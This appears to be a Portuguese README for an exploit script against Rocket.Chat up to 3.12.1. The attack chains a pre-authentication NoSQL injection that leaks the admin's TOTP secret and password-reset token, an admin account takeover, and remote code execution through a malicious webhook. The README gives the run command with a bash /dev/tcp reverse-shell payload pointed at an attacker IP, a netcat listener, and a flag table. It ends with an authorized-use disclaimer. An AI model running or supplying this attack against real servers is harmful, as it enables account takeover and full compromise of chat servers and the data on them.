
Exploit para Rocket.Chat 3.12.1 RCE via injeção NoSQL pré-autenticação, vazando o segredo TOTP do administrador e o token de redefinição de senha para alcançar execução remota de código por meio de integração maliciosa de webhook.
Explora uma vulnerabilidade de injeção NoSQL pré-autenticação no Rocket.Chat 3.12.1 para vazar o segredo TOTP do administrador e o token de redefinição de senha, assumir a conta do administrador e obter RCE por meio de uma integração maliciosa de webhook.
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
Antes de executar o exploit, inicie um listener netcat em um terminal separado para capturar o reverse shell de entrada:
nc -lvnp 4444
Mantenha este terminal aberto. Quando o exploit for executado com sucesso, o seu shell aparecerá aqui.
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
| Flag | Descrição |
|---|---|
-t | URL alvo do Rocket.Chat |
-u | Seu nome de usuário registrado com privilégios baixos |
-p | Sua senha registrada com privilégios baixos |
-e | Endereço de e-mail do administrador |
-a | Nome de usuário do administrador |
-c | Comando do reverse shell |
-v | Modo verboso (mostra respostas brutas) |
Esta ferramenta é apenas para fins educacionais e testes de penetração autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Sempre obtenha autorização escrita adequada antes de testar.